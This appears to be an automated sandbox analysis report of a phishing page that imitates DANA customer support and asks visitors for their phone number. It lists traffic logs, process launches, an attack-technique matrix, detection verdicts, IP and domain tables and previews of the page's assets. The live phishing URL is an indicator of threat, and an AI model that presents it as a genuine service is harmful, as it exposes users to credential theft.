Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: classification engineClassification label: mal56.win@16/51@12/9
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2320,i,17996028605859192159,13445879182102012152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bantuan-customer-care-dana.officio.asia/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2320,i,17996028605859192159,13445879182102012152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://bantuan-customer-care-dana.officio.asia/16%VirustotalBrowse
https://bantuan-customer-care-dana.officio.asia/100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bantuan-customer-care-dana.officio.asia
172.67.207.178
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      unknown
      code.jquery.com
      151.101.2.137
      truefalse
        unknown
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          unknown
          www.google.com
          172.217.18.4
          truefalse
            unknown
            fp2e7a.wpc.phicdn.net
            192.229.221.95
            truefalse
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://bantuan-customer-care-dana.officio.asia/ast/8d62ea654fcf0e4cae001e344ee2592c.csstrue
                unknown
                https://bantuan-customer-care-dana.officio.asia/ast/img/dana_text.pngtrue
                  unknown
                  https://bantuan-customer-care-dana.officio.asia/ast/img/bi.pngtrue
                    unknown
                    https://bantuan-customer-care-dana.officio.asia/ast/img/load_spin.pngtrue
                      unknown
                      https://a.nel.cloudflare.com/report/v4?s=UtFLnxrOceNUiReWd6AcFsKKBanqik7vlhUq5B1TiqpKFuzj4lGM5NHydcUVTFMHDNe9MiGScqtlkhyz4afCyYZ%2FVKpKfLUmcqGEPHMB5RHsSLMH8ngyojw3ktWGquAONjrZupqAwoAfG%2F8FXMX6UQT4WPaNezwP6kQ%3Dfalse
                        unknown
                        https://bantuan-customer-care-dana.officio.asia/true
                          unknown
                          https://bantuan-customer-care-dana.officio.asia/ast/3fadc676582b9542004b502ee03df3a3.csstrue
                            unknown
                            https://bantuan-customer-care-dana.officio.asia/ast/47e4c58f6b9789b8a33f2525cf084599.csstrue
                              unknown
                              https://bantuan-customer-care-dana.officio.asia/ast/img/hero.pngtrue
                                unknown
                                https://code.jquery.com/jquery-3.5.1.min.jsfalse
                                  unknown
                                  https://bantuan-customer-care-dana.officio.asia/ast/00b9d2e9f52e505c013c16bb638a42a4.csstrue
                                    unknown
                                    https://bantuan-customer-care-dana.officio.asia/ast/img/kom.pngtrue
                                      unknown
                                      https://bantuan-customer-care-dana.officio.asia/ast/6990a7033bbaeadc2040ac863ff124fd.csstrue
                                        unknown
                                        https://bantuan-customer-care-dana.officio.asia/ast/img/indo.pngtrue
                                          unknown
                                          https://bantuan-customer-care-dana.officio.asia/ast/img/dana_logo.pngtrue
                                            unknown
                                            https://bantuan-customer-care-dana.officio.asia/ast/jquery.mask.min.jstrue
                                              unknown
                                              https://bantuan-customer-care-dana.officio.asia/ast/img/load_bg.pngtrue
                                                unknown
                                                https://bantuan-customer-care-dana.officio.asia/favicon.icotrue
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  172.217.18.4
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  104.21.61.83
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  151.101.2.137
                                                  code.jquery.comUnited States
                                                  54113FASTLYUSfalse
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  151.101.194.137
                                                  unknownUnited States
                                                  54113FASTLYUSfalse
                                                  35.190.80.1
                                                  a.nel.cloudflare.comUnited States
                                                  15169GOOGLEUSfalse
                                                  172.67.207.178
                                                  bantuan-customer-care-dana.officio.asiaUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  IP
                                                  192.168.2.4
                                                  192.168.2.5
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1532632
                                                  Start date and time:2024-10-13 19:32:25 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 3m 12s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:browseurl.jbs
                                                  Sample URL:https://bantuan-customer-care-dana.officio.asia/
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:8
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal56.win@16/51@12/9
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 142.250.181.227, 172.217.16.142, 142.250.110.84, 34.104.35.123, 142.250.186.106, 142.250.185.99, 142.250.185.170, 142.250.185.202, 142.250.186.138, 172.217.16.202, 142.250.185.234, 142.250.186.42, 142.250.181.234, 172.217.18.106, 142.250.186.170, 216.58.206.74, 172.217.18.10, 142.250.184.202, 142.250.186.74, 142.250.185.74, 142.250.184.234, 88.221.110.91, 192.229.221.95, 20.3.187.198, 172.217.18.3
                                                  • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, update.googleapis.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                                                  • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  No simulations
                                                  InputOutput
                                                  URL: https://bantuan-customer-care-dana.officio.asia/ Model: gemini-1.5-flash
                                                  {
                                                  "text": "DANA Masukkan nomor HP kamu untuk lanjut +62 811-1234-5678 Nomor ponsel akan digunakan sebagai ID kamu & menjaga akun selalu aman. Dengan melanjutkan,
                                                   kamu setuju dengan Syarat & Ketentuan dan Kebijakan Privasi kami LANJUT",
                                                   "contains_trigger_text": false,
                                                   "trigger_text": "",
                                                   "prominent_button_name": "LANJUT",
                                                   "text_input_field_labels": ["Nomor HP"],
                                                   "pdf_icon_visible": false,
                                                   "has_visible_qrcode": false,
                                                   "has_visible_captcha": false,
                                                   "has_urgent_text": false}
                                                  URL: https://bantuan-customer-care-dana.officio.asia/ Model: jbxai
                                                  {
                                                  "brands":["DANA"],
                                                  "text":"Masukkan nomor HP kamu untuk lanjut +62 811-1234-5678 Nomor ponsel akan digunakan sebagai ID kamu & menjaga akun selalu aman. Dengan melanjutkan,
                                                   kamu setuju dengan Syarat & Ketentuan dan Kebijakan Privasi kami",
                                                  "contains_trigger_text":true,
                                                  "trigger_text":"Nomor ponsel akan digunakan sebagai ID kamu & menjaga akun selalu aman. Dengan melanjutkan,
                                                   kamu setuju dengan Syarat & Ketentuan dan Kebijakan Privasi kami",
                                                  "prominent_button_name":"LANJUT",
                                                  "text_input_field_labels":["Globi"],
                                                  "pdf_icon_visible":false,
                                                  "has_visible_captcha":false,
                                                  "has_urgent_text":false,
                                                  "has_visible_qrcode":false}
                                                  URL: https://bantuan-customer-care-dana.officio.asia/ Model: gemini-1.5-flash
                                                  {
                                                  "brands": ["DANA"]}
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  No context
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1572)
                                                  Category:downloaded
                                                  Size (bytes):17451
                                                  Entropy (8bit):5.359104590429714
                                                  Encrypted:false
                                                  SSDEEP:192:a/KWbqXV6uyErbqGIwYjc1Yk/MoBqNf6uyCrbqGIwYpa1GT/7Hqqmg6uy5rbqGIe:kaHq904Zq9H3gq98
                                                  MD5:71B2730C1CECF7A0768725BD944422C5
                                                  SHA1:8DFA323CB988538BCE8556A99BB5BD556E3593D1
                                                  SHA-256:851699A18B631A7BD68EFC99598701293A6065B463FCED7B68D8D6D9227BD8E7
                                                  SHA-512:E593A74CE83AAB1F8B9CA891B0D54BDBCC270202173C8842589B65F06E780A3384AF9BB3A79856AC71A01341D691E445371E1DEE8F6F3CA5DA2D883EC1EAD296
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&display=swap
                                                  Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSKmu1aB.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSumu1aB.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memvYaGs126MiZpBA-UvWbX2vVnXBbObj2OVTSOmu1aB.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (790), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):790
                                                  Entropy (8bit):4.933448562000252
                                                  Encrypted:false
                                                  SSDEEP:24:uE50J6DI3VEbsc2ZLEyLJbq4WsLbzzbWKhbG:950J9EbsPZYi77jX4
                                                  MD5:8308D2EA1D6EA02C0CB00F298799633E
                                                  SHA1:6DEEDBF3EEA7D45BD140179D681C8F78613073D6
                                                  SHA-256:FE9DF1A47B206F90C0F6A9BD88239D8EB22313978376F04D9E3FAB4A35317380
                                                  SHA-512:8D3345AD46056B4DE2B1D5C0B76F8DDF039B987244D92284C53D39EBB9EC4DBF640D1B3884427039DE2247C0D86A88CB91761B02A9E15174EA408BF16F40E5B4
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/47e4c58f6b9789b8a33f2525cf084599.css
                                                  Preview:.index {width: 100%;height: 100%;background: #118EEA;z-index: 9999;}.index .hero {margin: 20px 0;width: 100%;height: 330px;display: flex;justify-content: center;align-items: center;}.index .hero img {width: 90%;}.index .content {width: 100%;text-align: center;}.index .content h1 {margin-top: 60px;font-size: 24px;font-weight: 700;}.index .content .desc {margin-top: 7px;font-size: 16px;}.index .content .line {width: 80px;margin: 20px auto;height: 6px;border-radius: 30px;opacity: 0.7;background: #fff;}.index .content .log {font-size: 16px;}.index .content button:hover {background: #f4f4f4;transition: .2s;}.index .content button {margin-top: 20px;width: 90%;height: 47px;background: #fff;color: #118EEA;font-size: 16px;font-weight: 600;border: none;border-radius: 10px;transition: .2s;}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                  Category:downloaded
                                                  Size (bytes):8484
                                                  Entropy (8bit):7.924229044420093
                                                  Encrypted:false
                                                  SSDEEP:192:ZC238elt8IjGXdEaokt/9MmhXAHm2yPfBJbA7nXAZVGMGQC2:sg/lt88Gttf7XAmzPXADWGo
                                                  MD5:74ADB66E545A68DF7E5A0442A02FA8E7
                                                  SHA1:A1692D3BFBDE3C0CB3A8BC9B9B1FB2DE4D570E85
                                                  SHA-256:4285DB40C51CC53230CAB0490DF40566E285B48FB2B2E4729B42FF2A26C74480
                                                  SHA-512:44FFC291A4790B3F0CC6F78CC170F882975A7902BC14035F8108D28CBF304034553E2AB5BD4BD1D7D2BF78F8EF31EDA4ADBB89A66604B56B610D2908F338F8CE
                                                  Malicious:false
                                                  Reputation:low
                                                  URL:https://bantuan-customer-care-dana.officio.asia/ast/img/kom.png
                                                  Preview:.PNG........IHDR..............X......sRGB.........sBIT....|.d... .IDATx..{.%uu.....y...o.)2....x..A4..Dc.....WM.E.....d-....jn...L..(H@...&....Z....4.=.>U.{...._WW.SuN.Su....f...c.~.~....b.X,...b.X,...b.X,...b.X,...b.X,...b.X,...b.X,..eA#E......8....5.J."....%.H..W.............o./...&H.......FT.#y?.S.~f.%../!....S!R.$o...;..2.,p.....\.B.CI>@....c.......x3...........-L..M/..H.&...,/Z.V!...._<f...#E..-X.I..K.....-K...p..l+Z..c.$....V..-K...p....-HYq...L...`..C9.`..QU}".cY"X..@...$.......D.h.J...)....122.z.e....-KY 9,"..n..mAH^.l...1..Y.`/...-K.Xp-H......hY...]"r.B^?YP-....x....9..;88..hY.b.(......l5[.Y.j...s..........................)...pv.r.#n....-D....B.a.'.-G...`3._.x..N.;&&&.........t.R.~...P........8JUOv..e........"..x....B...G.-G. y..|ydd......`.o..W....8LD.}.</....N*Z.. .).7......,..Z..yC.nt.rx......Y..+..<.Z.g.-G.(|.........l..g.u}..Z.V..x...$..........V.........h;d.t..g...k..".,..%.^.O..T..j ..).....{..7......a.9...]Gr..lI%.).o.....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 480 x 118, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10588
                                                  Entropy (8bit):7.920893955198491
                                                  Encrypted:false
                                                  SSDEEP:192:M6+HXQMbqmgEy9n5LzCldeYK61VX+oqwckpZ7QSYQv/95F9aWfwNpkcRe/:M6gzb7g79nUHeYK6fJn7MSYU/9JPwNe5
                                                  MD5:3DC459976E4F7086419105435A80FC25
                                                  SHA1:4A79A70AE98BE7B6386DDDE8609D83EEE4777373
                                                  SHA-256:8AF7F1691E018BFC400432DFC61455F26F63226AB369E675C80CEF5A93334E87
                                                  SHA-512:E83D13B741E2C2E5AC38CB498485EB8C0E7D31E6D182DEB8A9AE54A3F306C301FC984AE6BC353142AC1FF7531B8C4A7E21D6711C23DD5F548EF38300208021C2
                                                  Malicious:false
                                                  Reputation:low
